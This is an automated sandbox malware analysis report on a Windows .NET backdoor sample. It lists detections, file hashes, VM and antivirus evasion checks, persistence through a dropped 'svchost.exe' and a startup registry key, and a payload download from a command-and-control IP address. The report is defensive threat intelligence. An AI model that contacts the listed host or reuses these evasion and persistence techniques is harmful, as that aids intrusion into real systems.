Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 45I8GbQlUj

Overview

General Information

Sample Name:45I8GbQlUj (renamed file extension from none to exe)
Analysis ID:553487
MD5:1b1e4286625bb189a526e910f2031c7b
SHA1:650c0550f12c65d9841d10ab589ff39261018957
SHA256:c9d7cb68dec80469c3c03b0e90c7af1972462ca7779424db3bfd9d44aebaa624
Tags:32exe
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
.NET source code contains potential unpacker
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Drops PE files with benign system names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • 45I8GbQlUj.exe (PID: 6100 cmdline: "C:\Users\user\Desktop\45I8GbQlUj.exe" MD5: 1B1E4286625BB189A526E910F2031C7B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 45I8GbQlUj.exeVirustotal: Detection: 24%Perma Link
Source: 45I8GbQlUj.exeReversingLabs: Detection: 20%
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeVirustotal: Detection: 24%Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeReversingLabs: Detection: 20%
Machine Learning detection for sampleShow sources
Source: 45I8GbQlUj.exeJoe Sandbox ML: detected
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJoe Sandbox ML: detected
Source: 45I8GbQlUj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.4:49760 -> 74.201.28.62:80
Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.4:49800 -> 74.201.28.62:5586
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: unknownTCP traffic detected without corresponding DNS query: 74.201.28.62
Source: 45I8GbQlUj.exe, svchost.exe.0.drString found in binary or memory: http://74.201.28.62/book/KB5009812.png
Source: global trafficHTTP traffic detected: GET /book/KB5009812.png HTTP/1.1Host: 74.201.28.62Connection: Keep-Alive
Source: 45I8GbQlUj.exe, 00000000.00000003.774232886.000000001B822000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exe, 00000000.00000000.650035857.0000000000452000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exe, 00000000.00000003.774253369.000000001B829000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exeBinary or memory string: OriginalFilenameKB5009812.exe. vs 45I8GbQlUj.exe
Source: 45I8GbQlUj.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe C9D7CB68DEC80469C3C03B0E90C7AF1972462CA7779424DB3BFD9D44AEBAA624
Source: 45I8GbQlUj.exeVirustotal: Detection: 24%
Source: 45I8GbQlUj.exeReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile read: C:\Users\user\Desktop\45I8GbQlUj.exeJump to behavior
Source: 45I8GbQlUj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to behavior
Source: classification engineClassification label: mal92.evad.winEXE@1/2@0/1
Source: C:\Users\user\Desktop\45I8GbQlUj.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeMutant created: \Sessions\1\BaseNamedObjects\EBA27E1D48D738BA9535923048CE6DEA
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: 45I8GbQlUj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 45I8GbQlUj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: 45I8GbQlUj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation:

barindex
.NET source code contains potential unpackerShow sources
Source: 45I8GbQlUj.exe, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: svchost.exe.0.dr, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.45I8GbQlUj.exe.450000.0.unpack, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 45I8GbQlUj.exeStatic PE information: 0x964C769C [Sat Nov 27 02:38:20 2049 UTC]

Persistence and Installation Behavior:

barindex
Drops PE files with benign system namesShow sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to dropped file
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to dropped file

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value created or modified: HKEY_CURRENT_USER\Software\EBA27E1D48D738BA9535923048CE6DEA PluginJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 4600Thread sleep time: -35000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 6508Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 6508Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exe TID: 4600Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWindow / User API: threadDelayed 2504Jump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWindow / User API: threadDelayed 7303Jump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: 45I8GbQlUj.exe, 00000000.00000003.662613955.0000000000A90000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Users\user\Desktop\45I8GbQlUj.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\45I8GbQlUj.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation221Registry Run Keys / Startup Folder11Registry Run Keys / Startup Folder11Masquerading11OS Credential DumpingSecurity Software Discovery221Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsModify Registry1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion131NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery213SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
45I8GbQlUj.exe25%VirustotalBrowse
45I8GbQlUj.exe21%ReversingLabsByteCode-MSIL.Backdoor.Zlugin
45I8GbQlUj.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe25%VirustotalBrowse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\svchost.exe21%ReversingLabsByteCode-MSIL.Backdoor.Zlugin

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://74.201.28.62/book/KB5009812.png0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://74.201.28.62/book/KB5009812.pngtrue
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
74.201.28.62
unknownUnited States
35913DEDIPATH-LLCUStrue

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:553487
Start date:15.01.2022
Start time:01:13:15
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 41s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:45I8GbQlUj (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal92.evad.winEXE@1/2@0/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 204.79.197.222
  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fp.msedge.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, a-0019.standard.a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

TimeTypeDescription
01:14:05API Interceptor443x Sleep call for process: 45I8GbQlUj.exe modified

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
74.201.28.62OG9rNsihJ7.exeGet hashmaliciousBrowse
    ECD2MpEBSf.exeGet hashmaliciousBrowse
      ZA3cYU28Yl.exeGet hashmaliciousBrowse
        6J3qzZz5pS.exeGet hashmaliciousBrowse

          Domains

          No context

          ASN

